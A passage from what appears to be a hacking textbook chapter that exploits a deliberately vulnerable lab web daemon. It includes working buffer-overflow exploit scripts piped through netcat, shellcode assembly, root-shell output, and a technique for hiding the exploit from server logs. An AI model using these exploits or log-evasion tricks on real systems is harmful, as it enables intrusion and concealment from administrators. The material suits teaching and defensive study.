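LANDING=$(( $BUF_START + 100 ))         # address 100 bytes into the buffer

# sled_size OFFSET SHELLCODE_BYTES [EXTRA_BYTES]
# NOP bytes left over once the shellcode, 32 copies of the 4-byte return
# address, and any extra leading data have been accounted for.
sled_size() {
   echo $(( $1 + 4 - (32 * 4) - $2 - ${3:-0} ))
}

printf 'offset  = %d\n' "$OFFSET"
printf 'landing = 0x%x\n' "$LANDING"
printf 'sled    = %d\n' "$(sled_size "$OFFSET" 83)"
```

With these inputs the script prints an offset of 540, a landing address of 0xbffff624, and a sled of 333 bytes. Calling sled_size 540 92 gives 324 for a 92-byte shellcode.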

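This all works fine, but if a shellcode of a different size is used, the NOP sled size must be recalculated. All of these repetitive steps can be put into a single shell script.

The BASH shell allows for simple control structures. The if statement at the beginning of this script is just for error checking and displaying the usage message. Shell variables are used for the offset and the overwriting return address, so they can be easily changed for a different target. The shellcode used for the exploit is passed as a command-line argument, which makes this a useful tool for trying out a variety of shellcodes.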

xtool_tinywebd.sh

#!/bin/sh
# A tool for exploiting tinywebd

if [ -z "$2" ]; then # If argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE))

echo "[NOP ($ALIGNED_SLED_SIZE bytes)] [shellcode ($SIZE bytes)] [ret addr ($((4*32)) bytes)]"
( perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
 perl -e "print \"$RETADDR\"x32 . \"\r\n\"";) | nc -w 1 -v $2 80

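Notice that this script repeats the return address an additional thirty-third time, but it uses 128 bytes (32 x 4) for calculating the sled size. This puts an extra copy of the return address past where the offset dictates. Sometimes different compiler options will move the return address around a little, so this makes the exploit more reliable. The output below shows this tool being used to exploit the tinyweb daemon once again, this time with the port-binding shellcode.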

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ./xtool_tinywebd.sh portbinding_shellcode 127.0.0.1
target IP: 127.0.0.1
shellcode: portbinding_shellcode (92 bytes)
[NOP (324 bytes)] [shellcode (92 bytes)] [ret addr (128 bytes)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root

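Now that the attacking side is armed with an exploit script, consider what happens when it is used. If you were the administrator of the server running the tinyweb daemon, what would be the first signs that you had been hacked?

Log Files

One of the two most obvious signs of intrusion is the log file. The log file kept by the tinyweb daemon is one of the first places to look when troubleshooting a problem. Even though the attacker's exploits were successful, the log file keeps a painfully obvious record that something is up.

tinywebd Log File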

reader@hacking:~/booksrc $ sudo cat /var/log/tinywebd.log
07/25/2007 14:55:45> Starting up.
07/25/2007 14:57:00> From 127.0.0.1:38127 "HEAD / HTTP/1.0"      200 OK
07/25/2007 17:49:14> From 127.0.0.1:50201 "GET / HTTP/1.1"       200 OK
07/25/2007 17:49:14> From 127.0.0.1:50202 "GET /image.jpg HTTP/1.1"      200 OK
07/25/2007 17:49:14> From 127.0.0.1:50203 "GET /favicon.ico HTTP/1.1"    404 Not Found
07/25/2007 17:57:21> Shutting down.
08/01/2007 15:43:08> Starting up.
08/01/2007 15:43:41> From 127.0.0.1:45396 "␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣jfX␣1␣CRj j ␣␣ ␣jfXCh ␣␣
 f␣T$ fhzifS␣␣j OV␣␣C ␣␣␣␣I␣? Iy␣␣
                                  Rh//shh/bin␣␣R␣␣S␣␣ $␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣
␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣
␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣" NOT HTTP!
reader@hacking:~/booksrc $

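Of course, in this case, after the attacker gains a root shell, he can simply edit the log file, since it is on the same system. On secure networks, however, copies of logs are often sent to another secure server. In extreme cases, logs are sent to a printer for hard copy, so there is a physical record. These types of countermeasures prevent tampering with the logs after successful exploitation.

Blend In with the Crowd

Even though the log files themselves cannot be changed, occasionally what gets logged can be. Log files usually contain many valid entries, whereas exploit attempts stick out like a sore thumb. The tinyweb daemon program can be tricked into logging a valid-looking entry for an exploit attempt. Look at the source code and see if you can figure out how to do this before continuing. The idea is to make the log entry look like a valid web request, like the following: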

07/22/2007 17:57:00> From 127.0.0.1:38127 "HEAD / HTTP/1.0"   200 OK
07/25/2007 14:49:14> From 127.0.0.1:50201 "GET / HTTP/1.1"    200 OK
07/25/2007 14:49:14> From 127.0.0.1:50202 "GET /image.jpg HTTP/1.1"   200 OK
07/25/2007 14:49:14> From 127.0.0.1:50203 "GET /favicon.ico HTTP/1.1"    404 Not Found

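This type of camouflage is very effective at large enterprises with extensive log files, since there are so many valid requests to hide among: it is easier to blend in at a crowded mall than on an empty street. But how exactly do you hide a big, ugly exploit buffer in the proverbial sheep's clothing?

There is a simple mistake in the tinyweb daemon's source code that allows the request buffer to be truncated early when it is used for the log file output, but not when it is copied into memory. The recv_line() function uses \r\n as the delimiter; however, all the other standard string functions use a null byte as the delimiter. These string functions are used to write to the log file, so by strategically using both delimiters, the data written to the log can be partially controlled.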
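The mismatch between the two delimiters can be seen with ordinary shell tools. The sketch below does not touch tinywebd at all; the function names and the FILLER-BYTES placeholder are hypothetical, and tr/head merely imitate what a null-terminated string function would see.

```sh
#!/bin/sh
# A request line with a null byte in the middle: a valid-looking request,
# a null byte, then placeholder bytes, terminated by \r\n.
make_request() {
   printf 'GET / HTTP/1.1\000%s\r\n' 'FILLER-BYTES'
}

# Total bytes on the wire, including the null byte and the \r\n terminator.
# A reader that only stops at \r\n takes in everything before the terminator.
wire_bytes() {
   make_request | wc -c | tr -d ' '
}

# Size of the leading request plus its null byte.
fake_request_size() {
   printf 'GET / HTTP/1.1\000' | wc -c | tr -d ' '
}

# What a null-terminated string function sees: only the bytes before the
# first null byte.
logged_text() {
   make_request | tr '\000' '\n' | head -n 1
}

echo "on the wire: $(wire_bytes) bytes"
echo "request + null: $(fake_request_size) bytes"
echo "string view: $(logged_text)"
```

Here 29 bytes are sent, but anything that treats the data as a C string sees only "GET / HTTP/1.1".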

The following exploit script puts a valid-looking request in front of the rest of the exploit buffer. The NOP sled is shrunk to accommodate the new data.

xtool_tinywebd_stealth.sh

#!/bin/sh
# stealth exploitation tool
if [ -z "$2" ]; then # If argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE))

echo "[Fake Request ($FR_SIZE b)] [NOP ($ALIGNED_SLED_SIZE b)] [shellcode ($SIZE b)] [ret addr ($((4*32)) b)]"
(perl -e "print \"$FAKEREQUEST\" . \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
 perl -e "print \"$RETADDR\"x32 . \"\r\n\"") | nc -w 1 -v $2 80

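This new exploit buffer uses the null byte delimiter to terminate the fake request camouflage. A null byte will not stop the recv_line() function, so the rest of the exploit buffer is copied to the stack. Since the string functions used to write to the log use a null byte for termination, the fake request is logged and the rest of the exploit is hidden. The following output shows this exploit script in use.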

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 7714
reader@hacking:~/booksrc $ jobs
[1]+ Running                  nc -l -p 31337 &
reader@hacking:~/booksrc $ ./xtool_tinywebd_stealth.sh loopback_shell 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell (83 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (318 b)] [shellcode (83 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

The connection used by this exploit creates the following log file entries on the server machine.

08/02/2007 13:37:36> Starting up.
08/02/2007 13:37:44> From 127.0.0.1:32828 "GET / HTTP/1.1"      200 OK

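Even though the logged IP address cannot be changed using this method, the request itself appears valid, so it will not attract much attention.

Overlooking the Obvious

In a real-world scenario, the other obvious sign of intrusion is even more apparent than log files. When testing, however, it is easily overlooked. If log files seem like the most obvious sign of intrusion to you, then you are forgetting about the loss of service. When the tinyweb daemon is exploited, the process is tricked into providing a remote root shell, but it no longer processes web requests. In a real-world scenario, this exploit would be detected almost immediately, as soon as someone tried to access the website.

A skilled hacker can not only crack open a program to exploit it, he can also put the program back together again and keep it running. The program continues to process requests, and it seems as if nothing happened.

One Step at a Time

Complex exploits are difficult because so many different things can go wrong, with no indication of the root cause. Since it can take hours just to track down where an error occurred, it is usually better to break a complex exploit into smaller parts. The end goal is a piece of shellcode that will spawn a shell yet keep the tinyweb server running. The shell is interactive, which causes some complications, so let's deal with that later. For now, the first step should be figuring out how to put the tinyweb daemon back together after exploiting it. Let's begin by writing a piece of shellcode that does something to prove it ran and then puts the tinyweb daemon back together so it can process further web requests.

Since the tinyweb daemon redirects standard output to /dev/null, writing to standard output is not a reliable marker for shellcode. One simple way to prove the shellcode ran is to create a file. This can be done by calling open() and then close(). Of course, the open() call needs the appropriate flags to create a file. We could look through the include files to figure out what O_CREAT and all the other necessary defines actually are and do all the bitwise math for the arguments, but that is a bit of a pain. If you recall, we have done something like this already: the notetaker program makes a call to open() that creates the file if it does not exist. The strace program can be used on any program to show every system call it makes. In the output below, it is used to verify that the arguments to open() in C match up with the raw system call.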

reader@hacking:~/booksrc $ strace ./notetaker test
execve("./notetaker", ["./notetaker", "test"], [/* 27 vars */]) = 0
brk(0)                                  = 0x804a000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe5000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=70799, ..}) = 0
mmap2(NULL, 70799, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fd3000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0`\1\000".., 512) = 512
fstat64(3, {st_mode=S_IFREG|0644, st_size=1307104, ..}) = 0
mmap2(NULL, 1312164, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e92000
mmap2(0xb7fcd000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3,
 0x13b) =
0xb7fcd000
mmap2(0xb7fd0000, 9636, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0)
 =
0xb7fd0000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e91000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e916c0, limit:1048575, seg_32bit:1,
contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fcd000, 4096, PROT_READ)   = 0
munmap(0xb7fd3000, 70799)               = 0
brk(0)                                  = 0x804a000
brk(0x806b000)                          = 0x806b000
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ..}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe4000
write(1, "[DEBUG] buffer   @ 0x804a008: \'t".., 37[DEBUG] buffer @ 0x804a008: 'test'
) = 37
write(1, "[DEBUG] datafile @ 0x804a070: \'/".., 43[DEBUG] datafile @ 0x804a070:
 '/var/notes'
) = 43
open("/var/notes", O_WRONLY|O_APPEND|O_CREAT, 0600) = -1 EACCES (Permission denied)
dup(2)                                  = 3
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fstat64(3, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ..}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe3000
_llseek(3, 0, 0xbffff4e4, SEEK_CUR)     = -1 ESPIPE (Illegal seek)
write(3, "[!!] Fatal Error in main() while".., 65[!!] Fatal Error in main() while opening 
file:
Permission denied
) = 65
close(3)                                = 0
munmap(0xb7fe3000, 4096)                = 0
exit_group(-1)                          = ?
Process 21473 detached
reader@hacking:~/booksrc $ grep open notetaker.c
         fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
                fatal("in main() while opening file");
reader@hacking:~/booksrc $

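When run through strace, the notetaker binary's suid bit is not used, so it does not have permission to open the data file. That does not matter, though; we just want to make sure the arguments to the open() system call match the arguments to the open() call in C. Since they match, we can safely use the values passed to the open() function in the notetaker binary as the arguments for the open() system call in our shellcode. The compiler has already done all the work of looking up the defines and combining them with a bitwise OR operation; we just need to find the call arguments in the disassembly of the notetaker binary.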

reader@hacking:~/booksrc $ gdb -q ./notetaker
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set dis intel
(gdb) disass main
Dump of assembler code for function main:
0x0804875f <main+0>:    push   ebp
0x08048760 <main+1>:    mov    ebp,esp
0x08048762 <main+3>:    sub    esp,0x28
0x08048765 <main+6>:    and    esp,0xfffffff0
0x08048768 <main+9>:    mov    eax,0x0
0x0804876d <main+14>:   sub    esp,eax
0x0804876f <main+16>:   mov    DWORD PTR [esp],0x64
0x08048776 <main+23>:   call   0x8048601 <ec_malloc>
0x0804877b <main+28>:   mov    DWORD PTR [ebp-12],eax
0x0804877e <main+31>:   mov    DWORD PTR [esp],0x14
0x08048785 <main+38>:   call   0x8048601 <ec_malloc>
0x0804878a <main+43>:   mov    DWORD PTR [ebp-16],eax
0x0804878d <main+46>:   mov    DWORD PTR [esp+4],0x8048a9f
0x08048795 <main+54>:   mov    eax,DWORD PTR [ebp-16]
0x08048798 <main+57>:   mov    DWORD PTR [esp],eax
0x0804879b <main+60>:   call   0x8048480 <strcpy@plt>
0x080487a0 <main+65>:   cmp    DWORD PTR [ebp+8],0x1
0x080487a4 <main+69>:   jg     0x80487ba <main+91>
0x080487a6 <main+71>:   mov    eax,DWORD PTR [ebp-16]
0x080487a9 <main+74>:   mov    DWORD PTR [esp+4],eax
0x080487ad <main+78>:   mov    eax,DWORD PTR [ebp+12]
0x080487b0 <main+81>:   mov    eax,DWORD PTR [eax]
0x080487b2 <main+83>:   mov    DWORD PTR [esp],eax
0x080487b5 <main+86>:   call   0x8048733 <usage>
0x080487ba <main+91>:   mov    eax,DWORD PTR [ebp+12]
0x080487bd <main+94>:   add    eax,0x4
0x080487c0 <main+97>:   mov    eax,DWORD PTR [eax]
0x080487c2 <main+99>:   mov    DWORD PTR [esp+4],eax
0x080487c6 <main+103>:  mov    eax,DWORD PTR [ebp-12]
0x080487c9 <main+106>:  mov    DWORD PTR [esp],eax
0x080487cc <main+109>:  call   0x8048480 <strcpy@plt>
0x080487d1 <main+114>:  mov    eax,DWORD PTR [ebp-12]
0x080487d4 <main+117>:  mov    DWORD PTR [esp+8],eax
0x080487d8 <main+121>:  mov    eax,DWORD PTR [ebp-12]
0x080487db <main+124>:  mov    DWORD PTR [esp+4],eax
0x080487df <main+128>:  mov    DWORD PTR [esp],0x8048aaa
0x080487e6 <main+135>:  call   0x8048490 <printf@plt>
0x080487eb <main+140>:  mov    eax,DWORD PTR [ebp-16]
0x080487ee <main+143>:  mov    DWORD PTR [esp+8],eax
0x080487f2 <main+147>:  mov    eax,DWORD PTR [ebp-16]
0x080487f5 <main+150>:  mov    DWORD PTR [esp+4],eax
0x080487f9 <main+154>:  mov    DWORD PTR [esp],0x8048ac7
0x08048800 <main+161>:  call   0x8048490 <printf@plt>
0x08048805 <main+166>:  mov    DWORD PTR [esp+8],0x180
0x0804880d <main+174>:  mov    DWORD PTR [esp+4],0x441
0x08048815 <main+182>:  mov    eax,DWORD PTR [ebp-16]
0x08048818 <main+185>:  mov    DWORD PTR [esp],eax
0x0804881b <main+188>:  call   0x8048410 <open@plt>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb)

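Remember that the arguments to a function call are pushed to the stack in reverse order. In this case, the compiler decided to use mov DWORD PTR [esp+offset], value_to_push_to_stack instead of push instructions, but the structure built on the stack is equivalent. The first argument is a pointer to the name of the file, held in EAX; the second argument (put at [esp+4]) is 0x441; and the third argument (put at [esp+8]) is 0x180. This means that O_WRONLY|O_CREAT|O_APPEND turns out to be 0x441 and S_IRUSR|S_IWUSR is 0x180. The following shellcode uses these values to create a file called Hacked in the root filesystem.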

mark.s

BITS 32 
; Mark the filesystem to prove you ran.
   jmp short one
   two:
   pop ebx              ; Filename
   xor ecx, ecx
   mov BYTE [ebx+7], cl ; Null terminate filename
   push BYTE 0x5        ; Open()
   pop eax
   mov WORD cx, 0x441   ; O_WRONLY|O_APPEND|O_CREAT
   xor edx, edx
   mov WORD dx, 0x180   ; S_IRUSR|S_IWUSR
   int 0x80             ; Open file to create it.
      ; eax = returned file descriptor
   mov ebx, eax         ; File descriptor to second arg
   push BYTE 0x6        ; Close ()
   pop eax
   int 0x80 ; Close file.

   xor eax, eax
   mov ebx, eax
   inc eax    ; Exit call.
   int 0x80   ; Exit(0), to avoid an infinite loop.
one:
   call two
db "/HackedX"
;   01234567
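The constants 0x441 and 0x180 used in mark.s can be cross-checked by OR-ing the individual flag values by hand. The sketch below assumes the octal values that the Linux x86 headers use for these defines; they are typed in here as an assumption rather than read from the system's include files.

```sh
#!/bin/sh
# Octal values assumed from the Linux x86 headers (not read from this system).
O_WRONLY=01
O_CREAT=0100
O_APPEND=02000
S_IRUSR=0400
S_IWUSR=0200

OPEN_FLAGS=$(( $O_WRONLY | $O_CREAT | $O_APPEND ))   # second argument to open()
OPEN_MODE=$(( $S_IRUSR | $S_IWUSR ))                 # third argument to open()

printf 'flags = 0x%x\n' "$OPEN_FLAGS"
printf 'mode  = 0x%x (octal %o)\n' "$OPEN_MODE" "$OPEN_MODE"
```

The results, 0x441 and 0x180 (octal 600), agree with the values in the disassembly and with the 0600 mode shown by strace.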

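The shellcode opens a file to create it and then immediately closes the file. Finally, it calls exit to avoid an infinite loop. The output below shows this new shellcode being used with the exploit tool.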

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ nasm mark.s
reader@hacking:~/booksrc $ hexdump -C mark
00000000  eb 23 5b 31 c9 88 4b 07  6a 05 58 66 b9 41 04 31  |.#[1.K.j.Xf.A.1|
00000010  d2 66 ba 80 01 cd 80 89  c3 6a 06 58 cd 80 31 c0  |.f....j.X.1.|
00000020  89 c3 40 cd 80 e8 d8 ff  ff ff 2f 48 61 63 6b 65  |.@..../Hacke|
00000030  64 58                                             |dX|
00000032
reader@hacking:~/booksrc $ ls -l /Hacked
ls: /Hacked: No such file or directory
reader@hacking:~/booksrc $ ./xtool_tinywebd_stealth.sh mark 127.0.0.1
target IP: 127.0.0.1
shellcode: mark (44 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (357 b)] [shellcode (44 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-17 16:59 /Hacked
reader@hacking:~/booksrc $

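Putting Things Back Together Again

To put things back together again, we just need to repair any collateral damage caused by the overwrite and/or the shellcode, and then jump execution back into the connection-accepting loop in main(). The disassembly of main() in the output below shows that we can safely return to the addresses 0x08048f64, 0x08048f65, or 0x08048fb7 to get back into the connection-accepting loop.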

reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x08048d93 <main+0>:    push   ebp
0x08048d94 <main+1>:    mov    ebp,esp
0x08048d96 <main+3>:    sub    esp,0x68
0x08048d99 <main+6>:    and    esp,0xfffffff0
0x08048d9c <main+9>:    mov    eax,0x0
0x08048da1 <main+14>:   sub    esp,eax

.:[ output trimmed ]:.

0x08048f4b <main+440>:  mov    DWORD PTR [esp],eax
0x08048f4e <main+443>:  call   0x8048860 <listen@plt>
0x08048f53 <main+448>:  cmp    eax,0xffffffff
0x08048f56 <main+451>:  jne    0x8048f64 <main+465>
0x08048f58 <main+453>:  mov    DWORD PTR [esp],0x804961a
0x08048f5f <main+460>:  call   0x8048ac4 <fatal>
0x08048f64 <main+465>:  nop
0x08048f65 <main+466>:  mov    DWORD PTR [ebp-60],0x10
0x08048f6c <main+473>:  lea    eax,[ebp-60]
0x08048f6f <main+476>:  mov    DWORD PTR [esp+8],eax
0x08048f73 <main+480>:  lea    eax,[ebp-56]
0x08048f76 <main+483>:  mov    DWORD PTR [esp+4],eax
0x08048f7a <main+487>:  mov    eax,ds:0x804a970
0x08048f7f <main+492>:  mov    DWORD PTR [esp],eax
0x08048f82 <main+495>:  call   0x80488d0 <accept@plt>
0x08048f87 <main+500>:  mov    DWORD PTR [ebp-12],eax
0x08048f8a <main+503>:  cmp    DWORD PTR [ebp-12],0xffffffff
0x08048f8e <main+507>:  jne    0x8048f9c <main+521>
0x08048f90 <main+509>:  mov    DWORD PTR [esp],0x804962e
0x08048f97 <main+516>:  call   0x8048ac4 <fatal>
0x08048f9c <main+521>:  mov    eax,ds:0x804a96c
0x08048fa1 <main+526>:  mov    DWORD PTR [esp+8],eax
0x08048fa5 <main+530>:  lea    eax,[ebp-56]
0x08048fa8 <main+533>:  mov    DWORD PTR [esp+4],eax
0x08048fac <main+537>:  mov    eax,DWORD PTR [ebp-12]
0x08048faf <main+540>:  mov    DWORD PTR [esp],eax
0x08048fb2 <main+543>:  call   0x8048fb9 <handle_connection>
0x08048fb7 <main+548>:  jmp    0x8048f65 <main+466>
End of assembler dump.
(gdb)

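All three of these addresses basically go to the same place. Let's use 0x08048fb7, since this is the original return address used for the call to handle_connection(). However, there are other things we need to fix first. Look at the function prologue and epilogue for handle_connection(). These are the instructions that set up and remove the stack frame structures on the stack.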

(gdb) disass handle_connection
Dump of assembler code for function handle_connection:
0x08048fb9 <handle_connection+0>:       push   ebp
0x08048fba <handle_connection+1>:       mov    ebp,esp
0x08048fbc <handle_connection+3>:       push   ebx
0x08048fbd <handle_connection+4>:       sub    esp,0x644
0x08048fc3 <handle_connection+10>:      lea    eax,[ebp-0x218]
0x08048fc9 <handle_connection+16>:      mov    DWORD PTR [esp+4],eax
0x08048fcd <handle_connection+20>:      mov    eax,DWORD PTR [ebp+8]
0x08048fd0 <handle_connection+23>:      mov    DWORD PTR [esp],eax
0x08048fd3 <handle_connection+26>:      call   0x8048cb0 <recv_line>
0x08048fd8 <handle_connection+31>:      mov    DWORD PTR [ebp-0x620],eax
0x08048fde <handle_connection+37>:      mov    eax,DWORD PTR [ebp+12]
0x08048fe1 <handle_connection+40>:      movzx  eax,WORD PTR [eax+2]
0x08048fe5 <handle_connection+44>:      mov    DWORD PTR [esp],eax
0x08048fe8 <handle_connection+47>:      call   0x80488f0 <ntohs@plt>

.:[ output trimmed ]:.

0x08049302 <handle_connection+841>:     call   0x8048850 <write@plt>
0x08049307 <handle_connection+846>:     mov    DWORD PTR [esp+4],0x2
0x0804930f <handle_connection+854>:     mov    eax,DWORD PTR [ebp+8]
0x08049312 <handle_connection+857>:     mov    DWORD PTR [esp],eax
0x08049315 <handle_connection+860>:     call   0x8048800 <shutdown@plt>
0x0804931a <handle_connection+865>:     add    esp,0x644
0x08049320 <handle_connection+871>:     pop    ebx
0x08049321 <handle_connection+872>:     pop    ebp
0x08049322 <handle_connection+873>:     ret
End of assembler dump.
(gdb)

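At the beginning of the function, the function prologue saves the current values of the EBP and EBX registers by pushing them to the stack, and sets EBP to the current value of ESP so it can be used as a point of reference for accessing stack variables. Finally, 0x644 bytes are reserved on the stack for these stack variables by subtracting from ESP. The function epilogue at the end restores ESP by adding 0x644 back to it and restores the saved values of EBX and EBP by popping them from the stack back into the registers.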
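The prologue also fixes where the saved registers sit relative to the request buffer. As a rough sketch, assuming the lea eax,[ebp-0x218] instruction in the disassembly above is the address of request[] being passed to recv_line(), the distances can be worked out as follows (the variable names are hypothetical):

```sh
#!/bin/sh
REQUEST_BELOW_EBP=0x218   # from "lea eax,[ebp-0x218]" before the recv_line() call

SAVED_EBX_OFFSET=$(( $REQUEST_BELOW_EBP - 4 ))   # "push ebx" leaves EBX at [ebp-4]
SAVED_EBP_OFFSET=$(( $REQUEST_BELOW_EBP ))       # "push ebp" leaves the old EBP at [ebp]
RETURN_OFFSET=$(( $REQUEST_BELOW_EBP + 4 ))      # the call leaves the return address at [ebp+4]

printf 'saved EBX      at request + %d\n' "$SAVED_EBX_OFFSET"
printf 'saved EBP      at request + %d\n' "$SAVED_EBP_OFFSET"
printf 'return address at request + %d\n' "$RETURN_OFFSET"
```

The last figure, 540, matches the offset measured earlier in GDB, and the saved EBX and EBP fall at 532 and 536 bytes, just below the return address.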

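The overwrite instructions are actually found in the recv_line() function; however, they write to data in the handle_connection() stack frame, so the overwrite itself happens in handle_connection(). The return address that we overwrite is pushed to the stack when handle_connection() is called, so the saved values for EBP and EBX pushed to the stack in the function prologue lie between the return address and the corruptible buffer. This means that EBP and EBX will get mangled when the function epilogue executes. Since we do not gain control of the program's execution until the return instruction, all the instructions between the overwrite and the return instruction must be executed. First, we need to assess how much collateral damage is done by these extra instructions after the overwrite. The assembly instruction int3 creates the byte 0xcc, which is literally a debugging breakpoint. The shellcode below uses an int3 instruction instead of exiting. This breakpoint will be caught by GDB, allowing us to examine the exact state of the program after the shellcode executes.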

mark_break.s

BITS 32
; Mark the filesystem to prove you ran.
   jmp short one
   two:
   pop ebx              ; Filename
   xor ecx, ecx
   mov BYTE [ebx+7], cl ; Null terminate filename
   push BYTE 0x5        ; Open()
   pop eax
   mov WORD cx, 0x441   ; O_WRONLY|O_APPEND|O_CREAT
   xor edx, edx
   mov WORD dx, 0x180   ; S_IRUSR|S_IWUSR
   int 0x80             ; Open file to create it.
      ; eax = returned file descriptor
   mov ebx, eax         ; File descriptor to second arg
   push BYTE 0x6        ; Close ()
   pop eax
   int 0x80  ; Close file.

   int3   ; Breakpoint interrupt (byte 0xcc)
one:
   call two
db "/HackedX"

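To use this shellcode, first get GDB set up to debug the tinyweb daemon. In the output below, a breakpoint is set right before handle_connection() is called. The goal is to restore the mangled registers to the original state found at this breakpoint.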

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root     23497  0.0  0.0   1636   356 ?        Ss   17:08   0:00 ./tinywebd
reader   23506  0.0  0.0   2880   748 pts/1    R+   17:09   0:00 grep tinywebd
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q -pid=23497 --symbols=./a.out

warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Attaching to process 23497
/cow/home/reader/booksrc/tinywebd: No such file or directory.
A program is being debugged already.  Kill it? (y or n) n
Program not killed.
(gdb) set dis intel
(gdb) x/5i main+533
0x8048fa8 <main+533>:   mov    DWORD PTR [esp+4],eax
0x8048fac <main+537>:   mov    eax,DWORD PTR [ebp-12]
0x8048faf <main+540>:   mov    DWORD PTR [esp],eax
0x8048fb2 <main+543>:   call   0x8048fb9 <handle_connection>
0x8048fb7 <main+548>:   jmp    0x8048f65 <main+466>
(gdb) break *0x8048fb2
Breakpoint 1 at 0x8048fb2: file tinywebd.c, line 72.
(gdb) cont
Continuing.

